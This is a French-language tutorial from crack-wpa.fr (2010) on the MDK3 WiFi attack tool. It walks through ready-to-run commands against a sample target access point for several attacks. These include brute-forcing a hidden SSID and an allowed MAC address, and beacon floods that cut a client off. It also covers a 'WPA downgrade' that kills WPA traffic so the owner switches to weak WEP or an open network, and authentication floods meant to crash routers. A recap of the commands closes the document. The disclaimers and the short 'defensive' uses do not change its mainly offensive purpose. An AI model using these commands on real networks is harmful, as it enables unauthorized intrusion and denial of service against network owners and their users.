TUTO MDK3 by Antares145

1 .Pour rappel, il est interdit de tester un rseau sans laccord de son propritaire !
2 .Pour le bon droulement de ce tuto, il est aussi interdit de fumer, de filmer dans la
salle, ou de faire un appel un ami.

Bonne sance

crack-wpa.fr 2010

Men In Hack 1 - MDK3

TABLE DES MATIRES :

1. YOU TAKE ZI APRO ? ...OK, MAIS ALORS VITE FAIT.
INTRODUCTION
2. PRPARATIFS
PRREQUIS
3. L, ON ME VOIT... L, ON ME VOIT PLUS... ON ME VOIT UN PEU... ON ME VOIT PLUS... L, ON ME VOIT.
BRUTEFORCE SSID
4. ALORS ! ...MAINTENANT C'EST QUI LE MAC ?
BRUTEFORCE MAC
5. BEACON FLOOD
BEACON FLOOD
6. WPA ?...EUHHH ? MEME PAS PEUR
WPA DOWNGRADE
WPA AUTRES ATTAQUES
7. ... PRIEZ PAUVRE PCHEUR !
AUTHENTICATION FLOOD
8. JE DDIE CET OSCAR, MON POISSON ROUGE.
CONCLUSION ET REMERCIEMENTS
9. RCAP COMMANDES DES FONCTIONS
BRUTEFORCE SSID
BRUTEFORCE MAC
BEACON FLOOD
WPA DOWNGRADE
WPA KOMBO
AUTHENTICATION FLOOD
===================================================================================

crack-wpa.fr 2010

1.

INTRODUCTION :

. MDK3 est un programme indispensable pour lanalyse des rseaux WiFi. Il a de nombreuses fonctions, dont la
plupart sont agressives vis--vis du rseau cibl. Vous verrez lors de son utilisation que sont but est
purement intrusif.

Tutoriel ralis sous BackTrack 4 finale, les mme tests ont t effectus avec 2 priphriques diffrents,
une cl Alfa AWUS036EH (antares145) et un adaptateur wifi usb AWUS036H 1000 mW (Cr@Sh).

. Certes pour les puristes et les habitus pas besoin de toute cette mise en scne et de tout ce verbiage, vous
pouvez donc accder directement la section 9. dans la Table des Matires 'Rcap/Commandes des fonctions'.
Pour les N00bz, la visite continue... Onjoy !

2.

PRREQUIS :
.

On ne lance pas dans la bataille sans prparation, on l'a dj mis dans l'introduction mais pour le matos, il
vous faut :
- BACKTRACK 4 FINAL TLCHARGEABLE, ici
- BT4 LE HOWTO POUR L'INSTALLATION EN DUR OU SUR UN SUPPORT USB, ici
(POUR LE LIVE-CD, NORMALEMENT VOUS SAVEZ GRAVER L'IMAGE DISQUE D' UN .ISO)

- DANS L'INTRODUCTION ON VOUS A FAIT REMARQU QUE LES TESTS AVAIENT T EFFECTUS AVEC DU
MATOS ALFA AWUS036EH / AWUS036H, (PEU IMPORTE SI VOUS N'AVEZ PAS CE MATRIEL, L'ESSENTIEL
C'EST QUE VOTRE CARTE SOIT SUPPORTE PAR LINUX, ET QU'ELLE PRENNE AUSSI EN CHARGE LE
MONITORING, L'INJECTION. DANS LE CAS OU BT4 N'A PAS VOTRE DRIVER, FAITES DES RECHERCHES ET
TLCHARGEZ LE... DONC, TOUS VOS GOOGLE'Z !)
crack-wpa.fr 2010

- LA VERSION DE MDK3 EST LA 3.6, LE PROGRAMME SE TROUVE DANS LE RPERTOIRE

/pentest/wireless/mdk3. PAR DFAUT IL N'EST PAS DANS LE PATH, CEST--DIRE QUIL NE PEUT PAS TRE
EXCUT EN TAPANT JUSTE MDK3.
ON COMMENCE DONC PAR CRER UN RACCOURCI POUR LEXCUTER DEPUIS NIMPORTE QUEL DOSSIER :
ln s /pentest/wireless/mdk3/mdk3 /usr/bin/mdk3

- MDK3 COMPORTE UNE AIDE ASSEZ COMPLTE, ON Y ACCDE EN TAPANT mdk3 --fullhelp
IL EST CONSEILL DALLER Y JETER UN IL, ET DY RETOURNER QUAND ON A UN DOUTE
PARAMTRES.

3.

BRUTEFORCE SSID :
Usages
- offensif :
- dfensif:

crack-wpa.fr 2010

attaquer un SSID pour le trouver sans quun client doive se connecter

tester son SSID pour voir combien de temps il tient contre le bruteforce

SUR LES

Analyse de la situation
- Une Cible prcise
On ne va pas vous rappeler qu'il est interdit de s'attaquer un rseau sans autorisation ...
Nous avons pas tout les lments en main mais fort heureusement notre source infiltre au sein de
l'organisation du Dr.Denfer, nous a fait parvenir 3 infos: - la localisation de l'AP wifi
- le channel (chan 6)
- la longueur de caractres (length: 9)
Cest comme tout faut avoir un minimum d'lments pour savoir ce que l'on cherche, bien entendu
sans avoir les infos noncs plus haut on peu quand mme arriver nos fins (cracker des SSID
au hasard pour trouver le bon, mais sans laccord des admins a reste quand mme illgal)...

Voyons un peu notre scan

- SSID masqu
Le rseau ne diffuse pas son nom (SSID), il sera donc invisible dans la liste des rseaux sans fil (sous
Windows), mais visible lors d'un monitoring (ex: avec airodump), on le verra sous la forme ''length x'',
dont x reprsente le nombre de caractre du nom de l'AP.
(ex: Frailbox-D9AE99 <== le length fait 15 caractres)

crack-wpa.fr 2010

Avant de pouvoir cracker une quelconque cl de scurit, on va d'abord faire apparaitre l' SSID.
Ici, nous voyons bien le recoupement de nos infos (le chan 6, le length: 9), c'est sans aucun doute notre cible
Nous allons pouvoir commencer cracker l' SSID cach, et pour y voir plus clair on va relancer un scan plus
cibl. (pour le visu du scan, il y a rien de plus chiant que d'avoir plus de 20 AP qui mettent dans le mme
primtre, sans compter les clients).

A LATTAQUE !!!
Pour trouver l'SSID, il y a 2 possibilits:
1.

On attend quun client se (re)connecte, on sniffe avec Airodump ce moment-l et on obtient le SSID
en clair. (Vous avez plus de chance d'y arriver de cette faon, sauf si le dico du bruteforce est efficace)
2. On bruteforce le SSID, cest--dire quon essaie toutes les possibilits jusquau moment o on
trouve le bon. Cest ca que mdk3 va servir !

Thorie
mdk3 <interface> p <options> -c <canal> -t <mac_cible>
Options :

-b : caractres autoriss pour le bruteforce pur

a = tous
n = chiffres
l = minuscules
c = min et maj
u = majuscules
m = min, maj et chiffres
-f : essayer tous les SSID contenus dans un fichier externe, bruteforce dico
-s : nombre de paquets par seconde, si on le spcifie pas (dfaut : 300)

crack-wpa.fr 2010

Application

Bruteforce pur (faon bourrin) :

-

On voit que notre SSID a une longueur de 9. Nous allons donc tenter le mode bruteforce pur, sur 9
caractres. On doit spcifier le canal du rseau concern, et aussi la liste des caractres autoriss. Comme
ici on nen sait rien, on prend Maj+Min+Num+Symbole a . On ouvre un autre terminal pour
laisser Airodump scanner, et on tape la ligne ci dessous (et dans notre cas, 00:21:30:ED:99:9A).
Ex :

root@bt:~# mdk3 mon0 p -c 6 b a -t 00:21:30:ED:99:9A

Bruteforce avec dico :

-

Un bruteforce sur 9 caractres prend beaucoup de temps. On va donc prparer un fichier dictionnaire qui
comprend toutes les permutations des 9 caractres " Maj+Min+Num+Symbole" (voir dautres tutos pour
la gnration de fichiers dictionnaire, peu importe lextension du fichier a peu tre un .txt, .lst, et mme
sans).
Notre commande devient donc :
Ex :

root@bt:~# mdk3 mon0 p -c 6 f /root/dico.lst -t 00:21:30:ED:99:9A

" Pour votre dico, concernant le nom et le chemin cest comme vous voulez, dans mon cas cest /root/dico.lst "

crack-wpa.fr 2010

Soyez patient car a peut prendre un temps considrable

Finalement on a de la chance, on tombe sur le SSID rapidement, cest gagn ! Notons galement que le
SSID apparat dsormais dans Airodump :

crack-wpa.fr 2010

On remarque que les diffrents essais ont t enregistrs comme des stations , chacune avec le SSID quelle a
essay. Cest une bonne faon de dtecter lattaque !
ATTENTION !!! Lors du Bruteforce pour que les stations soient visibles dans votre Airodump
Il faut lancer ce scan:

root@bt:~# airodump-ng c 6 mon0

Et non celui la, car on ne voit pas les stations safficher lors du Bruteforce dans airodump:
root@bt:~# airodump-ng -bssid 00:21:30:ED:99:9A c 6 mon0

Note : certains AP ne rvlent pas la longueur de leur SSID quand ils le masquent. On voit alors <length :0> ou
<length : 1 > dans Airodump. MDK3 peut attaquer ces SSID, mais il doit essayer toutes les longueurs, et ca
peut prendre du temps

crack-wpa.fr 2010

4.

BRUTEFORCE MAC :
Usages
- offensif : trouver une MAC valide sans attendre quun client se connecte
- dfensif : tester son AP pour voir combien de temps il tient contre le bruteforce MAC

- Filtrage dadresses MAC

Seules les machines ayant une adresse MAC autorise pourront se connecter au rseau.

Remarque : Le mode Bruteforce MAC a une efficacit limite. Il fonctionnera sur des rseaux OPN, WEP,
WPA/ WPA2-Tkip (AES pas test) et certains AP y rsistent
Maintenant quon connat le SSID, on voudrait avoir une adresse MAC accepte par le systme. Pour ne pas
devoir attendre quun client se connecte, on va essayer toutes les MAC possibles jusqu ce quon en
trouve une qui convient.

Thorie
mdk3 <interface> f <options> -t <mac_cible>
Options : -f : fixer ladresse de dpart ; ex : commencer 00:11:22:33:44:00
Ex: root@bt:~# mdk3 mon0 f f 00:11:22:33:44:00 t <mac_cible>

-m : plage des adresses essayer ; ex : essayer toutes les adresses

qui commencent par 00:11:22.
on ne peut pas cumuler loption -f et -m

Application
Un bruteforce de toutes les adresses possibles est extrmement long. Ici, on suppose quon sait (par social
engineering par exemple) quun iPhone se connecte sur le rseau. On peut donc spcifier quon ne veut essayer que
les adresses des cartes Apple, identifies par les 3 premiers octets. Notre commande est donc :
Ex :

crack-wpa.fr 2010

root@bt:~# mdk3 mon0 f m 00:26:08 t 00:21:30:ED:99:9A

10

Ici, on triche un peu en dmarrant directement une adresse proche, pour des raisons de temps. Mais en ralit,
la commande ci-dessus marchera sans doute aussi, tout dpend si lAP a une scurit qui bloque les associations
en cas de flood ou pas. Ce genre de scurit est facile voir dans MDK3, puisque les adresses testes se changent
plus (mdk3 reste fig sur une adresse). Soit cest dt lantiflood de lAP, soit mdk3 qui est un peu bugg pour le
bruteforce mac.
Autre remarque, tous les iPhone nont pas spcialement une adresse similaire Apple possde plusieurs plages
dadresse MAC, et il faut peut-tre en scanner plusieurs avant de trouver une bonne adresse
Conclusion :

5.

Le bruteforce MAC prend beaucoup de temps (surtout si on a aucune ide de ladresse, il y a

quand mme 281.000 milliards dadresses possibles), et a une efficacit limite face aux AP
qui dtectent un grand nombre de tentatives dassociation.
De plus, il est lgrement bugg dans la version actuelle de mdk3 (valid aussi par Cr@Sh), donc
il vaut mieux prfrer la premire technique : attendre quun client se connecte et copier son
adresse

BEACON FLOOD :
Un paquet Beacon est un paquet envoy par un AP pour signaler sa prsence et donner ses caractristiques
(cryptage, mode A/B/G/N, SSID,)
MDK3 permet dinjecter des paquets Beacon sur un rseau, pour simuler des AP qui nexistent pas. On peut
crasher un driver (en particulier sous Windows) qui dtecterait 500 rseaux dun coup

crack-wpa.fr 2010

11

Usages
- offensif : crasher un pilote WiFi en faisant croire quil y a un grand nombre de rseaux
- offensif : imiter un grand nombre de rseaux avec le mme nom quun rseau normal
les clients ne savent pas lequel est le bon et ne savent pas sy connecter
- dfensif: idem que le prcdent, mais pour empcher un attaquant de savoir quel rseau est
le vrai et donc lempcher dattaquer/se connecter. Ca marche bien sous
Windows, moins bien sous Linux, mais ca peut servir de protection
supplmentaire.
- dfensif: brouiller compltement les pistes face aux scanners genre Netsumbler (qui peut
planter sil dtecte trop de rseaux dun coup), ou mme Kismet et Airodump (qui
sont noys sous le nombre de rseaux, donc les rsultats sont illisibles)
Ici, on a chop ladresse MAC de liPhone. Mais comment l'utiliser pendant que celui-ci est sur le rseau ? Simple,
on va lempcher de garder la connexion ou de se reconnecter !
Pour cela on cre plein de rseaux qui portent le mme nom dAP ex : "Dr.Denfer", comme a l iPhone ne saura
pas lequel est vrai et il ne saura plus sy connecter

Thorie
mdk3 <interface> b <options>
Options :

-n <SSID> : crer tous des rseaux avec le mme SSID

-f, -v : lire les SSID et/ou les MAC depuis un fichier externe
-m : utiliser des adresses MAC relles
-d, -g : crer des rseaux en Ad-Hoc ou en 54 MBps
-c : pour spcifier le chan
-w, -t, -a : crer des rseaux crypts en WEP, WPA+TKIP ou WPA+AES
[autres options : voir mdk3 --help b]

Application
Pour que ca ressemble au vrai, on va donc crer des rseaux crypts en WPA+TKIP (-t), en mode 54Mbits (-g)
optionnel, et avec des adresses ralistes (-m). La commande est donc :
Ex :

crack-wpa.fr 2010

root@bt:~# mdk3 mon0 b n Dr.Denfer m t g

12

On peut aussi prciser le channel "-c", dans notre cas :

Ex :

root@bt:~# mdk3 mon0 b n Dr.Denfer m t g c 6

Bizarrement avec du WPA2 le rsultat est alatoire, vrifiez dans airodump, (en cas dchec il reste le "wpa
downgrade")
Comme par dfaut liPhone ne se sert pas du BSSID (adresse MAC de lAP) pour se connecter un rseau, il est
dans le brouillard et on a le champ libre

6.a WPA DOWNGRADE (et autres options WPA) :

Usages
- offensif : faire croire la cible que le WPA est bugg et le forcer repasser en WEP
ou en OPN
- dfensif : Euuuh ???....Ah oui , cest pour tester la rsistance de lAP
crack-wpa.fr 2010

13

- Cryptage de la cl
A moins d'aimer les gros challenges, on va essayer de transformer le WPA en WEP ou OPN, du moins
on va faire en sorte que a le devienne en forant l'admin changer son mode de scurit, car l'heure
actuelle il est relativement simple de s'introduire dans un rseau OPN ou WEP 64 & 128.

Nous allons utiliser une autre fonction de MDK3 qui va empcher uniquement le trafic WPA (en
dsauthentifiant les stations qui mettent en WPA). Comme ca, le propritaire va croire que WPA ne
marche pas, et il va passer en WEP (ou mme en Open) !...EuhhhOu pas.

Thorie
mdk3 <interface> g -t <mac_AP_cible>
(pas doption, laissez juste le programme travailler ^^ on peu russir planter lAP)

Application
Tant que cette attaque tourne, tout le trafic WPA sera tu, mais le trafic WEP ou OPN passera sans problme. Il
suffit maintenant dattendre que le propritaire remarque que le WPA ne marche pas, et quil repasse en WEP. En
wpa2 on croit que le wpa downgrade ne fait pas son boulot, mais en fait la longue si, a peut aller trs vite,
comme a peu prendre un peu de temps, mais trs peu. De toute faon au final c'est blackout.
Ex :

root@bt:~# mdk3 mon0 g t 00:21:30:ED:99:9A

Cette attaque requiert donc que le propritaire ne soit pas trop dbutant (il faut quil sache comment (re)passer en
WEP), mais quil ne sy connaisse pas trop non plus (sinon il remarquera lattaque). Donc la prochaine fois que
votre WPA plante subitement, rflchissez-y 2 fois avant de passer gentiment en WEP
14
crack-wpa.fr 2010

6.b AUTRES ATTAQUES WPA :

-

WPA KOMBO (OU LE DOUBLE EFFET KISS KOOL)

Si lAP est en WPA/WPA2-Tkip (AES pas test) on peux trs bien cumuler le " Beacon Flood "
et le " WPA Downgrade ", On ouvre deux Shell dans une Konsole:

Shell 1 pour le Beacon Flood

: root@bt:~# mdk3 mon0 b n <nom AP_cible> m t g

Shell 2 pour le WPA Downgrade : root@bt:~# mdk3 mon0 g t <Mac AP_cible>

- michael shutdown & tests 802.1X

MDK3

comporte aussi les modes -m (michael shutdown) et -x (tests 802.1X) pour attaquer
spcifiquement les rseaux de type WPA et liminer leur trafic. Ils ne seront pas dvelopps ici,
mais si vous tes intresss, les dtails se trouvent dans la fullhelp
(mdk3 --fullhelp)

Une fois la scu du rseau change en OPN ou en WEP, notre but est quasi atteint (tout dpend du but ).
Ici on est dj cens savoir comment casser une cl WEP, donc on passe ltape suivante

crack-wpa.fr 2010

15

7.

AUTHENTIFICATION FLOOD :
Usages
- offensif : faire planter un AP pour couper le rseau
- dfensif : vrifier si un AP est rsistant face cette attaque
MDK3

peut gnrer un grand nombre de demandes dassociation et les envoyer sur le mme AP. Certains
routeurs crashent quand le nombre de demandes devient trop lev, mais les appareils modernes ont
souvent une scurit qui limite 500 ou 1000 le nombre de tentatives.

Thorie
mdk3 <interface> a <options>
Options : -m : utiliser des adresses MAC ralistes
-a <mac_cible> : nattaquer que lAP cibl
-c : ne pas vrifier que la tentative a march
-i : mode intelligent, prfrer, ignore les options -c et -a
-s : nombre de paquets mis par seconde (dfaut : illimit)

Application
On veut, par pur vandalisme, faire planter notre rseau cible. On lance donc simplement
Ex :

root@bt:~# mdk3 mon0 a m i 00:21:30:ED:99:9A

On constate que Dr.Denfer est donc bien immunise contre lauth flood

crack-wpa.fr 2010

16

8.

9.

CONCLUSION ET REMERCIEMENTS :
-

MDK3 est donc un outil trs intressant pour lanalyse des rseaux WiFi. Il est trs orient agressif/vandalisme
mais on peut lutiliser pour voir comment rsiste notre rseau face ce type dagression. On aura aussi
remarqu que la majorit des attaques sont dites "de saturation"

On a volontairement coup la partie "destruction mode", car les effets de ces commandes peuvent crasher les
rseaux proximits, si vous avez compris ce tuto, il vous sera donc ais de retrouver ces commandes.

Je voudrais remercier le site brico-wifi, qui propose une bonne synthse des possibilits de mdk3
Et Cr@Sh pour la mise en forme.

RCAP COMMANDES DES FONCTIONS :

BRUTEFORCE SSID

Thorie
mdk3 <interface> p <options> -c <canal> -t <mac_cible>
Options :

-b : caractres autoriss pour le bruteforce pur

a = tous
n = chiffres
l = minuscules
c = min et maj
u = majuscules
m = min, maj et chiffres
-f : essayer tous les SSID contenus dans un fichier externe, bruteforce dico
-s : nombre de paquets par seconde, si on le spcifie pas (dfaut : 300)

BruteForce Pur, Ex :

root@bt:~# mdk3 mon0 p -c 6 b a -t 00:21:30:ED:99:9A

BruteForce Dico, Ex : root@bt:~# mdk3 mon0 p -c 6 f /root/dico.lst -t 00:21:30:ED:99:9A

ATTENTION !!! Pour que les stations soient visibles dans votre Airodump
Il faut lancer ce scan:

root@bt:~# airodump-ng c 6 mon0

Et non celui la, car on ne voit pas le Bruteforce dans airodump:

root@bt:~# airodump-ng -bssid <mac AP_cible> c 6 mon0

BRUTEFORCE MAC
Thorie
mdk3 <interface> f <options> -t <mac_cible>
Options : -f : fixer ladresse de dpart ; ex : commencer 00:11:22:33:44:00
Ex: root@bt:~# mdk3 mon0 f f 00:11:22:33:44:00 t <mac_cible>

-m : plage des adresses essayer ; ex : essayer toutes les adresses

qui commencent par 00:11:22.
on ne peut pas cumuler loption -f et -m
Ex :

crack-wpa.fr 2010

root@bt:~# mdk3 mon0 f m 00:11:22 t <mac AP_cible>

17

BEACON FLOOD
Thorie
mdk3 <interface> b <options>
Options :

-n <SSID> : crer tous des rseaux avec le mme SSID

-f, -v : lire les SSID et/ou les MAC depuis un fichier externe
-m : utiliser des adresses MAC relles
-d, -g : crer des rseaux en Ad-Hoc ou en 54 MBps
-c : pour spcifier le chan
-w, -t, -a : crer des rseaux crypts en WEP, WPA+TKIP ou WPA+AES
[autres options : voir mdk3 --help b]

Ex :

root@bt:~# mdk3 mon0 b n <nom AP_cible>m t g

WPA DOWNGRADE
Thorie
mdk3 <interface> g -t <mac_AP_cible>
(pas doption, laissez juste le programme travailler ^^)

Ex :

root@bt:~# mdk3 mon0 g t 00:11:22:33:44:55

AUTRE ATTAQUES WPA

Thorie
WPA KOMBO (OU LE DOUBLE EFFET KISS KOOL)
Si lAP est en WPA/WPA2-Tkip (AES pas test) on peut trs bien cumuler le " Beacon Flood " et
le " WPA Downgrade ", On ouvre deux Shell dans une Konsole :

Shell.1 le Beacon Flood :

root@bt:~# mdk3 mon0 b n <AP_victim> m t g

Shell.2 le WPA Downgrade :

root@bt:~# mdk3 mon0 g t <Mac AP_victim>

AUTHENTIFICATION FLOOD
Thorie
mdk3 <interface> a <options>
Options : -m : utiliser des adresses MAC ralistes
-a <mac_cible> : nattaquer que lAP cibl
-c : ne pas vrifier que la tentative a march
-i : mode intelligent, prfrer, ignore les options -c et -a
-s : nombre de paquets mis par seconde (dfaut : illimit)

Ex :

crack-wpa.fr 2010

root@bt:~# mdk3 mon0 a m i 00:21:30:ED:99:9A

18